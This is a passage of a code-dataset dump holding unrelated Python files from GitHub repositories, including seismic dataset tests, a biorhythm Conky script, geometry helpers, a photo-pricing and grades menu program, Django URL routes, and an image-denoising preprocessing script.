100))\n def test_create_2D_dataset_custom_cdp(self, t, f, s):\n dataset = create2d_dataset(dims=(t, 100), first_cdp=f, cdp_step=s)\n assert dataset.cdp.data.max() == f + s * t - s\n\n @given(integers(1, 10000), integers(0, 100), integers(1, 100), integers(0, 50))\n def test_create_2D_dataset_wfirstoffset(self, s, f, r, o):\n dataset = create2d_dataset(\n dims=(100, s, 5),\n first_cdp=f,\n cdp_step=s,\n sample_rate=r,\n 
first_offset=o,\n offset_step=10,\n )\n assert dataset.offset.data.max() == 4 * 10 + o\n\n\nclass TestCreate3DDataset:\n \"\"\"\n Test creating 3D datasets with various shapes\n \"\"\"\n\n @given(\n tuples(integers(1, 10000), integers(1, 10000), integers(0, 1000)),\n sampled_from(list(VerticalUnits)),\n )\n def test_create_full_stack_dataset(self, d, u):\n dataset = create3d_dataset(dims=d, vert_units=u)\n assert dataset.d3_domain == \"TWT\"\n assert dataset.measurement_system == u\n\n @given(\n integers(15, 60),\n floats(0, 15),\n floats(1, 15),\n sampled_from([\"TWT\", \"twt\", \"DEPTH\", \"depth\"]),\n )\n def test_create_angle_stack_dataset(self, o, f, s, d):\n dataset = create3d_dataset(\n (1000, 1000, 100, o), first_offset=f, offset_step=s, vert_domain=d\n )\n assert dataset.d3_domain == d.upper()\n assert len(dataset.dims) == 4\n","repo_name":"trhallam/segysak","sub_path":"tests/test_seismic_dataset.py","file_name":"test_seismic_dataset.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"32"}
+{"seq_id":"3526773695","text":"def findReciprocal(Value):\r\n try:\r\n print(\"Value:-\", Value)\r\n r = 1/Value\r\n print(\"The reciprocal of\",Value,\"is\",r,\"\\n\")\r\n\r\n except Exception:\r\n print(\"You cannot find the reciprocal of\",Value,\"\\n\")\r\n\r\n\r\nfindReciprocal(\"hello\")\r\nfindReciprocal(2)","repo_name":"Abhishek6625/python","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"31942370719","text":"# Get some basic information about a list\n\nlist1 = [9, 1, -4, 3, 7, 11, 3]\n\n#print('list1 =', len(list1))\n#print('list1.Max=', max(list1))\n#print('list1.Min=', min(list1))\n# print('list1.3={}'.format(list1.count(3)))\n\n# append: insert at the end\n# insert: insert in the middle\n# remove: delete an element\n# reverse: reverse in place\n# sort: sort (ascending by default, descending with reverse=True)\n\n\n# Modifying a list\n\nlist2 = ['a', 'c', 'd']\n\n# Append a new element 'e' to the end of list2\nlist2.append('e')\n#print('list2=', list2)\n\n\n# Insert a 'b' between the 'a' and 'c' in list2\nlist2.insert(1, 'b')\n#print('list2=', list2)\n\n# Remove the 'b' from list2\nlist2.remove('b')\n#print('list2=', list2)\n\n\n# Change an element\nlist2[0] = '1'\n#print('list2=', list2)\n\n\n#a = '123'\n#a[0] = 'a'\n#a = 'abc'\n\n\n# Reverse a list\nlist3 = [1, 2, 3]\nlist3.reverse()\n#print('list3=', list3)\n\n\n# Sort a list\n\nlist4 = [9, 1, -4, 3, 7, 11, 3]\nlist4.sort(reverse=True)\n#print('list4=', list4)\n\n\nlist5 = [1, 'a', 3, [1, 2], 'c']\n\n# print(max(list5))\nprint(format(list5.count(1)))\nlist5.append('b')\nlist5.insert(1, 2)\nlist5.remove('b')\nlist5[2] = 3\nlist5[3] = 4\n\nlist5.reverse() # order before reversing: strings > lists > integers\n# list5.sort(reverse=True) cannot sort in reverse: the mixed types are not comparable\nprint(list5)\n","repo_name":"op5280546/Python-Test","sub_path":"列表和元組/list_methods.py","file_name":"list_methods.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"296008374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow biorhythm warnings like the KOSMOS-1 calculator with Conky\nP: physical\nE: emotional\nI: intellectual\n\n2013-08-23\n\nRed: critical days\nOrange: mini-critical days\nSee http://decodesystems.com/kosmos-1.html\n\nDominant cycle is shown in parentheses.\n\nargument 1: number of days in advance (today = 0)\n\n\"\"\"\n\ndd,mm,yy=1,1,1990\n\nfrom datetime import date\nfrom sys import argv\nfrom math import sin,pi\n\nt0 = date(yy,mm,dd).toordinal()\nt1 = date.today().toordinal()\n\nwa=(\n((1,12,13),(7,18)),\n((1,15),(8,22)),\n((1,17,18),(9,26))\n)\n\ns = {'_': '${color green}●${color}', 'y': '${color yellow}●${color}', 'r': '${color red}●${color}'}\n\nout = \"\"\n\nt = t1 + int(argv[1])\n\nw = ['_','_','_']\no = ['*','*','*']\nperc = [0,0,0]\nfor c in range(3):\n p = 23+5*c\n perc[c] = 100.*sin(2*pi*(t-t0)/p)\n v = ((t-t0) % p)+1\n if (v-1) <= p/2:\n o[c] = 'H'\n if (v-1) >= p/2:\n o[c] = 'T'\n if v in wa[c][0]:\n w[c] = 'r'\n o[c] = 'K'\n if v in wa[c][1]:\n w[c] = 'y'\nfor x in w:\n out += s[x] + ' '\nfor x in o:\n out += x + ' '\n\nif perc[0]>perc[1] and perc[0]>perc[2]:\n out += '(P)'\nelif perc[1]>perc[0] and perc[1]>perc[2]:\n out += '(E)'\nelse:\n out += '(I)'\n\nprint(out)\n","repo_name":"trivedisorabh/PyoRhythm","sub_path":"conky/bioconky.py","file_name":"bioconky.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
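The Conky script above scores each cycle as a sine of the days lived, with periods 23 (physical), 28 (emotional) and 33 (intellectual) coming from `p = 23+5*c`. A standalone check of that formula, with arbitrary example dates:

```python
# Biorhythm percentages for an example birthday and target date.
from datetime import date
from math import sin, pi

born = date(1990, 1, 1).toordinal()
today = date(2013, 8, 23).toordinal()
days = today - born
for name, p in [('P', 23), ('E', 28), ('I', 33)]:
    print(name, round(100 * sin(2 * pi * days / p), 1))
```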
+{"seq_id":"35720542878","text":"import re\nimport yaml\n\nMF_ID_KEYWORD = \"MF\"\nMF_COMMENT_KEYWORD = \"Comment\"\nMF_SIGNATURE = \"#MF:\"\nMF_PATTERN = re.compile(\"([ \\t]*#MF:.*(\\r\\n?|\\n)([ \\t]*#([^M][^F][^:])?.*(\\r\\n?|\\n))*)\")\n\ndef occurence_ranges(occs, text):\n pairs = []\n for occ in occs:\n pos = text.find(occ, pairs[-1][-1] if len(pairs) > 0 else None)\n if pos >= 0:\n pairs.append((pos, pos+len(occ)))\n return pairs\n\ndef line_ranges(text):\n return occurence_ranges(text.splitlines(True), text)\n\ndef pattern_occurences(regexp, text):\n def filter_tuples(match):\n if isinstance(match, tuple):\n return match[0]\n return match\n\n matches = map(filter_tuples,regexp.findall(text))\n return occurence_ranges(matches, text)\n\nclass InplaceMustfailParser(object):\n \"\"\"\n MF is the commented YAML text, having the following convention:\n MF - field for MF id\n Comment - field for comments\n Other fields may be introduced in later versions\n\n Example 1:\n #MF: BUG-45\n #Comment: |\n # first line of comment\n # last line\n\n Example 2:\n #MF: http://mybugtracker/ID33\n #Comment: bla bla bla\n \"\"\"\n\n def __init__(self, feature):\n self.feature_text = feature.original_string\n self.mf_occs = pattern_occurences(MF_PATTERN, feature.original_string)\n self.line_occs = line_ranges(feature.original_string)\n self.linenum2mf = self.__map_lines_mfs()\n self.mf_dict = self.__as_dict(feature)\n\n def __map_lines_mfs(self):\n def mf_on_line(mf, line):\n line_start, line_end = line\n mf_start, mf_end = mf\n mf_end = mf_end if mf_start == mf_end else mf_end-1\n return line_start <= mf_end < line_end\n\n nline2mf = {}\n try:\n nlines = enumerate(self.line_occs)\n n, line = next(nlines)\n for mf in self.mf_occs:\n while True:\n if mf_on_line(mf, line):\n nline2mf[n+1] = mf\n break\n n, line = next(nlines)\n except StopIteration:\n pass\n return nline2mf\n\n def __len__(self):\n return len(self.mf_dict)\n\n def __item_under_mf(self,linenum):\n return (linenum-1) in self.linenum2mf\n\n def __mf_text_for_line(self, linenum):\n start, end = self.linenum2mf[linenum-1]\n return self.feature_text[start:end]\n\n def __create_mf_item(self, pattern, mf_text, linenum):\n text = mf_text.replace(\"#\", \"\")\n d = yaml.safe_load(text)\n result = {'pattern' : pattern}\n if MF_ID_KEYWORD in d:\n result[\"id\"] = d[MF_ID_KEYWORD]\n if MF_COMMENT_KEYWORD in d:\n result['comment'] = d[MF_COMMENT_KEYWORD]\n result['line'] = linenum\n return result\n\n def __check_add_mf(self, linenum, name, lst_to_add):\n if self.__item_under_mf(linenum):\n lst_to_add.append(\n self.__create_mf_item('.*?{name}.*?'.format(name=name),\n self.__mf_text_for_line(linenum),\n linenum))\n\n def as_dict(self):\n return self.mf_dict\n\n def __as_dict(self, feature):\n mf = {}\n mf_scenarios = []\n mf_steps = []\n mf_features = []\n\n self.__check_add_mf(feature.described_at.line, feature.name, mf_features)\n\n for scenario in feature.scenarios:\n self.__check_add_mf(scenario.described_at.line, scenario.name, mf_scenarios)\n for step in scenario.steps:\n self.__check_add_mf(step.described_at.line, step.sentence, mf_steps)\n\n if len(mf_features) > 0:\n mf['features'] = mf_features\n if len(mf_scenarios) > 0:\n mf['scenarios'] = mf_scenarios\n if len(mf_steps) > 0:\n mf['steps'] = mf_steps\n\n return {'MustFail': mf} if len(mf) > 0 else {}\n\n","repo_name":"griddynamics/bunch","sub_path":"lettuce_bunch/mustfail.py","file_name":"mustfail.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"38919071332","text":"# https://programmers.co.kr/learn/courses/30/lessons/12951\n# Make a JadenCase string\n\ndef solution(s):\n s = list(s)\n start = 0\n \n for i in range(len(s)):\n if start == 0 and s[i].isalpha():\n s[i] = s[i].upper()\n elif s[i].isalpha():\n s[i] = s[i].lower()\n if s[i] == \" \":\n start = 0\n else:\n start = start + 1\n\n return \"\".join(s)","repo_name":"miche715/Programmers-Algorithm","sub_path":"python/p_12951.py","file_name":"p_12951.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32756154905","text":"from functools import partial\n\ntry:\n from shapely.geometry import mapping, shape\n from shapely.geos import TopologicalError\nexcept ImportError:\n pass\ntry:\n import numpy as np\nexcept ImportError:\n pass\ntry:\n import visvalingamwyatt as vw\nexcept ImportError:\n pass\n\n\ndef clipper(bbox):\n \"\"\"\n Create a clipping function for a given bounding box.\n\n Args:\n bbox (tuple): bounding box\n\n Returns:\n function that will clip given geometries to the input bounding box\n \"\"\"\n minx, miny, maxx, maxy = bbox\n bounds = {\n \"type\": \"Polygon\",\n \"coordinates\": [[(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]],\n }\n try:\n bbox_shape = shape(bounds)\n\n def func(geometry):\n # This is technically only needed in Py3, but whatever.\n try:\n clipped = bbox_shape.intersection(shape(geometry))\n except (ValueError, TopologicalError):\n return geometry\n\n return mapping(clipped)\n\n except NameError:\n\n def func(geometry):\n return geometry\n\n return func\n\n\ndef clip(geometry, bounds):\n \"\"\"\n Clip a geometry to a bounding box. 
Equivalent to calling clipper(bounds)(geometry).\n\n Args:\n geometry (dict): geometry object\n bounds (tuple): bounding box\n\n Returns:\n (dict) geometry\n \"\"\"\n try:\n return clipper(bounds)(geometry)\n\n except NameError:\n return geometry\n\n\ndef simplifier(ratio):\n \"\"\"\n Create a simplification function, if visvalingamwyatt is available.\n Otherwise, return a noop function.\n\n Args:\n ratio (int): Between 1 and 99\n\n Returns:\n simplification function\n \"\"\"\n try:\n # put this first to get NameError out of the way\n simplify = vw.simplify_geometry\n\n if ratio is None or ratio >= 100 or ratio < 1:\n raise SvgisError(\"Invalid ratio\")\n\n return partial(simplify, ratio=ratio / 100.0)\n\n except (TypeError, ValueError, NameError):\n return None\n\n\ndef scale(coordinates, scalar=1):\n '''Scale a list of coordinates by a scalar. Only use with projected coordinates'''\n try:\n try:\n arr = np.array(coordinates, dtype=float)\n\n except TypeError:\n arr = np.array(list(coordinates), dtype=float)\n\n return arr * scalar\n\n except NameError:\n if isinstance(coordinates, tuple):\n return [coordinates[0] * scalar, coordinates[1] * scalar]\n\n return [(c[0] * scalar, c[1] * scalar) for c in coordinates]\n\n\ndef scale_rings(rings, factor=1):\n \"\"\"Apply scale() to a list of rings.\"\"\"\n return [scale(ring, factor) for ring in rings]\n\n\ndef scale_geom(geom, factor=1):\n \"\"\"\n Scale a geometry by a given factor\n\n Args:\n geom (dict): geojson-like dict\n factor (numeric): scale factor, default: 1\n \"\"\"\n if geom['type'] == 'MultiPolygon':\n geom['coordinates'] = [scale_rings(rings, factor) for rings in geom['coordinates']]\n\n elif geom['type'] in ('Polygon', 'MultiLineString'):\n geom['coordinates'] = scale_rings(geom['coordinates'], factor)\n\n elif geom['type'] in ('MultiPoint', 'LineString'):\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'Point':\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'GeometryCollection':\n geom['geometries'] = [scale_geom(i) for i in geom['geometries']]\n\n else:\n raise NotImplementedError(f\"Unsupported geometry type: {geom['type']}\")\n\n return geom\n","repo_name":"fitnr/svgis","sub_path":"src/svgis/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"}
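A quick check of the `clip()` helper above; it needs shapely installed (otherwise the helper falls back to returning the input unchanged), and the geometry values here are arbitrary:

```python
# Clip a 2x2 square to the unit bounding box.
square = {
    "type": "Polygon",
    "coordinates": [[(0, 0), (0, 2), (2, 2), (2, 0), (0, 0)]],
}
clipped = clip(square, bounds=(0, 0, 1, 1))
print(clipped["type"])         # 'Polygon'
print(clipped["coordinates"])  # vertices of the unit square (order depends on shapely)
```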
+{"seq_id":"1961992544","text":"############################################################################################################################\n#PHOTOGRAPHS PROGRAM\nimport re\ndef Fotografias():\n total = 0\n\n print(\"\\n######################################\\n#Welcome To The Photographs System#\\n######################################\\n\")\n \n Cantidad_Fotos = int(input(\"\\nEnter The Number Of Photographs\\n\"))\n\n Tipo_Fotografia = input(\"\\nPhotograph type: a)Black and white b)Color\\n\")\n Tipo_Fotografia = Tipo_Fotografia.upper()\n\n Tamaño_Foto = int(input(\"\\nPhotograph size: 1.-4 x 6 2.-6x8 3.-8x10 4.-10x12\\n\"))\n\n #CHECK WHETHER THE PHOTOGRAPH TYPE IS BLACK AND WHITE\n if Tipo_Fotografia == \"A\":\n \n #CHECK THE PHOTOGRAPH SIZE; IF AN UNAVAILABLE OPTION IS CHOSEN, SHOW A MESSAGE TO THE USER\n if Tamaño_Foto == 1: \n total = (1.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (3.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (10.0 * Cantidad_Fotos)\n \n else:\n print(\"Selected Option Not Available\")\n\n #CHECK WHETHER THE PHOTOGRAPH TYPE IS COLOR\n elif Tipo_Fotografia == \"B\":\n\n #CHECK THE PHOTOGRAPH SIZE; IF AN UNAVAILABLE OPTION IS CHOSEN, SHOW A MESSAGE TO THE USER\n if Tamaño_Foto == 1: \n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (12.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (15.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (18.5 * Cantidad_Fotos)\n \n else:\n print(\"Selected Option Not Available\")\n\n #IF IT IS NEITHER BLACK AND WHITE NOR COLOR, SHOW AN OPTION-NOT-AVAILABLE MESSAGE\n else:\n print(\"Selected Option Not Available\") \n\n servicio = input(\"\\nWill The Service Be Printed (I) Or By E-mail (C)?:\\n\")\n servicio = servicio.upper()\n\n\n if servicio == \"I\":\n total = total + (total * 0.15)\n print(f\"TOTAL to pay: $ {total} pesos\\n\") \n elif servicio == \"C\":\n \n #VALIDATE WITH A REGULAR EXPRESSION (VIA THE \"re\" LIBRARY) THAT THE INPUT LOOKS LIKE AN E-MAIL ADDRESS; IF NOT, SHOW AN INVALID-ADDRESS MESSAGE AND ASK FOR THE ADDRESS AGAIN\n while True:\n print(\"\\nPlease enter the destination e-mail address:\\n\") \n correo = input()\n if re.match('^[(a-z0-9\\_\\-\\.)]+@[(a-z0-9\\_\\-\\.)]+\\.[(a-z)]{2,15}$',correo.lower()):\n print(f\"\\nThe E-mail Address It Will Be Sent To Is: {correo}\")\n print(f\"\\nTOTAL to pay: $ {total} pesos\\n\")\n break\n else:\n print (\"*** INVALID E-MAIL ADDRESS ***\")\n#######################################################################################################################################\n#GRADES PROGRAM\ndef Calificaciones(estudiantes):\n\n #VARIABLE TO STORE EACH STUDENT'S GRADE\n calificacion = 0\n\n #ACCUMULATORS FOR THE NUMBER OF STUDENTS WITH EACH GRADE\n calificaciones7 = 0\n calificaciones8 = 0\n calificaciones9 = 0\n calificaciones10 = 0\n\n #ACCUMULATORS FOR THE STUDENTS WHO PASSED AND THOSE WHO DID NOT\n estudiantes_aprobados = 0\n estudiantes_reprobados = 0\n\n #VARIABLES FOR PLOTTING IF THE USER CHOOSES THAT OPTION\n A = \"\"\n R = \"\"\n \n\n#THIS FOR LOOP READS THE STUDENTS' GRADES AND TALLIES THE STUDENTS WHO PASSED AND FAILED\n for i in range(estudiantes):\n calificacion = int(input(f\"\\nEnter Grade No. {i + 1}\\n\" )) \n if calificacion >= 7:\n estudiantes_aprobados = estudiantes_aprobados + 1\n if calificacion == 7:\n calificaciones7 = calificaciones7 + 1\n if calificacion == 8:\n calificaciones8 = calificaciones8 + 1\n if calificacion == 9:\n calificaciones9 = calificaciones9 + 1 \n if calificacion == 10:\n calificaciones10 = calificaciones10 + 1 \n else:\n estudiantes_reprobados = estudiantes_reprobados + 1\n\n print(f\"\\nStudents with a grade of 7: {calificaciones7}\")\n print(f\"Students with a grade of 8: {calificaciones8}\")\n print(f\"Students with a grade of 9: {calificaciones9}\")\n print(f\"Students with a grade of 10: {calificaciones10}\")\n\n print(f\"\\nStudents Who Failed: {estudiantes_reprobados}\\nStudents Who Passed: {estudiantes_aprobados}\")\n \n graficar = input(\"\\nDo You Want To Plot The Results Y/N?:\\n\")\n graficar = graficar.upper()\n\n if graficar == \"Y\":\n for i in range (estudiantes_aprobados):\n A = A + \"**\"\n \n for i in range (estudiantes_reprobados):\n R = R + \"**\"\n\n print(f\"\\n--------CHART---------\\nA {A}\\nR {R}\\n\")\n import matplotlib.pyplot as plt\n import numpy as np\n\n #USING MATPLOTLIB, SHOW A WINDOW WITH A CHART OF THE STUDENTS WHO SCORED 7, 8, 9 AND 10\n #ARRAY with the grades as strings\n calificacionestxt = ['Grade 7', 'Grade 8', 'Grade 9', 'Grade 10']\n #ARRAY with the count for each grade as an integer\n calificacionesval = [calificaciones7 , calificaciones8 , calificaciones9 , calificaciones10 ]\n\n fig, ax = plt.subplots()\n #Put a label on the Y axis\n ax.set_ylabel('NUMBER OF STUDENTS')\n #Set the chart title\n ax.set_title('Distribution Of PASSING Grades')\n #Create the bar chart using the grades as the X axis and the student counts as the Y axis.\n plt.bar(calificacionestxt, calificacionesval)\n \n #Display the chart with the show() method\n gr = plt.show()\n return gr\n else:\n print(\"Exiting...\\n\") \n##############################################################################################################################\n#MAIN PROGRAM\n#LOOP UNTIL THE USER CHOOSES OPTION 3 OR AN OPTION OTHER THAN 1 AND 2\nwhile True:\n print(\"********************************\\n***** Welcome To The Menu *****\\n********************************\\n1. Photographs 2. Grades 3. Exit\")\n opcion = int(input(\"Select An Option\\n\"))\n \n #CALL THE PHOTOGRAPHS FUNCTION AND RUN ITS FLOW\n if opcion == 1:\n Fotografias()\n #CALL THE GRADES FUNCTION AND RUN ITS FLOW; IT TAKES PARAMETERS AND RETURNS A VALUE DEPENDING ON THE USER'S CHOICE\n elif opcion == 2:\n print(\"\\n#########################################\\n#Welcome To The Grades System#\\n#########################################\\n\")\n \n estudiantes = int(input(\"Number of students in the group:\\n\"))\n Calificaciones(estudiantes)\n #IF THE USER CHOOSES OPTION 3 OR ENTERS AN OPTION OTHER THAN 1 OR 2, SHOW AN EXITING MESSAGE AND FINISH\n else:\n print(\"Exiting...\")\n break ","repo_name":"MeXinuX/Calificaciones-Fotografias","sub_path":"photo&¬es.py","file_name":"photo&¬es.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
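For reference, here is the chart the grades program above draws, reduced to a standalone sketch with made-up counts:

```python
# Minimal version of the passing-grades bar chart above (data is made up).
import matplotlib.pyplot as plt

labels = ['Grade 7', 'Grade 8', 'Grade 9', 'Grade 10']
counts = [3, 5, 2, 1]

fig, ax = plt.subplots()
ax.set_ylabel('NUMBER OF STUDENTS')
ax.set_title('Distribution Of PASSING Grades')
plt.bar(labels, counts)
plt.show()
```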
views.like_comment, name='comment-like'),\n path('/reply/', views.new_reply, name='reply'),\n path('/create-reply', views.create_reply, name='create-reply'),\n path('/reply-like/', views.like_reply, name='reply-like')\n \n]\n\n\n","repo_name":"magahu/instaclonegram","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38226783779","text":"# # Data Pre-processing (This code does not need to be run!)\n\n# # Image preparation\n\n# Please note this script does not need to be run. We will provide the pre-processed images in the file named `dataset.parquet`. However, this script will provide evidence of the pre-processing steps we have \n# taken, from the source, up to the dataset export stage.\n# \n# The original dataset is available [here](http://adrianbarburesearch.blogspot.com/p/renoir-dataset.html). We have contacted the author and obtained his permission to use and share a modified copy of the data set for the purpose of this project. We have downloaded the three aligned datasets `Canon T3i`, `Canon S90`, and `Xiaomi Mi3` and saved them in a folder, please replace `ENTER_ALIGNED_PICTURES_FOLDER_HERE` with the full path of the aligned images folder on your computer.\n\nimport cv2\nimport glob\nimport tqdm\nimport os\nfrom collections import defaultdict\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nfrom shutil import rmtree, copyfile, copytree\nnp.random.seed(70103)\n\n### clean up the environment\n#### 1. remove the \"data directory\" and create a new one\nos.makedirs(\"data\")\n\n#### 2. remove the images in local folder\nfor file in glob.glob(\"*.png\"):\n os.remove(file)\n \n#### 3. Copy the \"Aligned\" folders in \"data\"\nfor folder in glob.glob(\"ENTER_ALIGNED_PICTURES_FOLDER_HERE/*Aligned*\"):\n copytree(folder, os.path.join(\"data\",folder.split(\"/\")[-1]))\n\n\n# ## 1. Remove irrelevant images and files\n# Remove all the objects which are not needed for the current analysis.\npicturesToRemoveList = glob.glob(\"./**/*_Aligned/**/*full*\") + glob.glob(\"./**/*_Aligned/**/Thumbs*\") + glob.glob(\"./**/*_Aligned/**/*plot*\") + glob.glob(\"./**/*_Aligned/*.txt\") + glob.glob(\"./**/*_Aligned/**/Mask*.bmp\") \nfor file in picturesToRemoveList:\n os.remove(file)\n\n# ## 2. Convert the images to grayscale and save to .png (original files are in .bmp)\n# We list up all the images in the `Mi3_Aligned`, `S90_Aligned` and `T3i_Aligned` folders, then we convert the `bmp` format into `png` and, finally, resize all the pictures to half of their dimensions in order to have more interesting data in the image patches.\npicturesList = glob.glob(\"./**/*_Aligned/**/*.bmp\")\nprint(f\"There are {len(picturesList)} images to convert\")\n\nfor image in tqdm.tqdm(picturesList):\n img = cv2.imread(image)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ### shrink images\n gray = cv2.resize(gray, (gray.shape[1]//2,gray.shape[0]//2))\n cv2.imwrite(image.replace(\".bmp\",\".png\"),gray)\n\n\n# ## 3. Remove the .bmp pictures since they have been replaced.\npicturesToRemoveList = glob.glob(\"./**/*_Aligned/**/*.bmp\")\nfor file in picturesToRemoveList:\n os.remove(file)\n\n# ## 4. Discard some noisy images\n# We need to discard more data. Each of the subfolders contain some `Batch` folders which indicate a scene. 
Each scene features a *reference* (the ground truth) and some *noisy images* (input for the denoising model).\n# If there is only `1` noisy picture, this is kept. If there are `2` or more noisy pictures in the `Batch` folder, then a random number is sampled from a categorical with number of categories $k$ corresponding to the number of noisy images in the folder. Then the image corresponding to the index sampled from the categorical distribution is kept.\nfoldersToCheck = glob.glob(\"./**/**/Batch*\")\nfor folder in foldersToCheck:\n ## retrieve the noisy images from the folder\n noisy_images = glob.glob(os.path.join(folder,\"*Noisy.png\"))\n ## there must be at least a noisy image\n assert len(noisy_images)>=1\n ## if only one picture is noisy, keep it. Else, sample from categorical and remove the pictures not corresponding to the sampled index.\n if len(noisy_images)>1:\n idx = np.random.randint(len(noisy_images))\n ## remove the sampled image from the list of the pictures to delete. Send to a dummy. We don't need it.\n noisy_images.pop(idx);\n ## delete the other pictures\n for delImage in noisy_images:\n os.remove(delImage)\n\n \n### THIS PART CAN BE IGNORED BUT IS KEPT FOR REPRODUCIBILITY ##############################\ncopyfile(\"./data/Mi3_Aligned/Batch_014/IMG_20160210_062948Reference.png\", \"reference.png\")\ncopyfile(\"./data/Mi3_Aligned/Batch_014/IMG_20160210_063005Noisy.png\", \"input.png\")\nrmtree(\"./data/Mi3_Aligned/Batch_014\")\nimg = cv2.imread(\"input.png\")[:600,500:1000]\ncv2.imwrite(\"input.png\",img)\nimg = cv2.imread(\"reference.png\")[:600,500:1000]\ncv2.imwrite(\"reference.png\",img) \n###########################################################################################\n\n# ## 5. Dataset generation\nprint(f\"We now have a total of {len(glob.glob('./**/**/**/*.png'))} images\")\n\n# There are in total 240 images, of which 120 include noise and 120 do not. These images are, however, very large. We can therefore split each large image into multiple images of smaller size and square shape (the square shape is not strictly necessary, but it allows the convolutional neural network to optimize memory handling).\n# \n# The split can be done in two different ways:\n# - sliding window\n# - partitioning\n# \n# The *sliding window* method allows to obtain more smaller images from a single large image, as the smaller patches are allowed to overlap. This however can lead to issues of data leakage of the test set into the training set. *Partitioning* allows to deal with the issue by making sure that the intersection between two different patches of the image is the empty set.\n# \n# For this particular project, we decide to split each image into a `128x128` pixel patches. 
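For contrast with the partitioning used below, here is a minimal sketch of the *sliding window* alternative mentioned in this discussion: patches of the same `128x128` size are extracted at a chosen stride, so neighbouring patches overlap whenever the stride is smaller than the patch size. The `stride` parameter is an assumption for illustration only.

import numpy as np

def sliding_window_patches(img, size=128, stride=64):
    """Extract (possibly overlapping) size x size patches from a 2-D image."""
    h, w = img.shape
    patches = []
    for y in range(0, h - size + 1, stride):
        for x in range(0, w - size + 1, stride):
            patches.append(img[y:y + size, x:x + size])
    return np.stack(patches) if patches else np.empty((0, size, size), img.dtype)

# With stride == size this degenerates to the non-overlapping partitioning
# used later in the script; with stride < size patches share pixels, which is
# why a naive train/test split over such patches can leak information.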
The remainder of the pixels at the border of the images that are too few to result in a patch are discarded.\nallImages = glob.glob(\"./**/**/**/*.png\")\nsize = 128 #set up the size to split in\nimageDictionary = defaultdict(lambda : {\"input\" : 0, \"target\" :0})\ntot_images = 0 #keep track of the total number of images\nfor image in tqdm.tqdm(allImages):\n ### set up the image in a dictionary\n flag = \"input\" if \"Noisy\" in image else \"target\"\n name = image.split(\"/\")[-3].lower() + \"_\" + image.split(\"/\")[-2].lower()\n img = cv2.imread(image, cv2.IMREAD_UNCHANGED)\n h , w = img.shape\n new_h, new_w = h//size * size , w//size * size \n imageDictionary[name][flag] = img[:new_h, :new_w].reshape(h//size, size, -1, size).swapaxes(1,2).reshape(-1,size,size)\n tot_images += imageDictionary[name][flag].shape[0]\n\nprint(f\"The total number of patches is {tot_images}\")\n\nidx = 50\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(10,5))\nax[0].imshow(imageDictionary[\"s90_aligned_batch_011\"][\"input\"][idx,...],cmap=\"gray\")\nax[1].imshow(imageDictionary[\"s90_aligned_batch_011\"][\"target\"][idx,...],cmap=\"gray\")\nax[0].axis(\"off\")\nax[1].axis(\"off\")\nplt.suptitle(\"Comparison of Images: Input (left) and Target (right)\")\nplt.tight_layout()\n\n\n# ## 6. Group the images in a large matrix, subsample them, and save them to parquet\n\n# Instantiate a large numpy matrix to store the image data. We will encode the three different cameras as:\n# \n# 0. MI3\n# 1. T3I\n# 2. S90\n# \n# These values will be saved in the first column of the numpy matrix.\n\nnumpy_matrix = np.zeros((tot_images,2*size**2+1), dtype=np.uint8)\ni = 0\nkeys = sorted(list(imageDictionary.keys()))\ncamera_dict = {\"mi3\":0, \"t3i\":1, \"s90\":2}\nfor key in tqdm.tqdm(keys):\n value = imageDictionary[key]\n ### concatenate images horizontally\n concatenated_images = np.concatenate((value[\"input\"].reshape(value[\"input\"].shape[0],-1),value[\"target\"].reshape(value[\"target\"].shape[0],-1)), axis=1)\n concatenated_images = np.concatenate((np.array([camera_dict[key.split(\"_\")[0]]]*concatenated_images.shape[0]).reshape(-1,1), concatenated_images), axis=1)\n numpy_matrix[i:i+concatenated_images.shape[0],:] = concatenated_images\n i+=concatenated_images.shape[0]\n\n\n# We then discard the \"uninteresting\" pictures (those which are black almost everywhere). We then keep only the images whose:\n# - sum of intensities is larger than 10 (remove all black pictures)\n# - the standard deviation is larger than 25 (keep pictures featuring large intensity variations).\nnumpy_matrix = numpy_matrix[np.logical_and((numpy_matrix[:,1:1+size**2]).sum(axis=1) > 10,(numpy_matrix[:,1:1+size**2]).std(axis=1) > 25),:]\n\n\n# Given the 100Mb storage limit, we will only 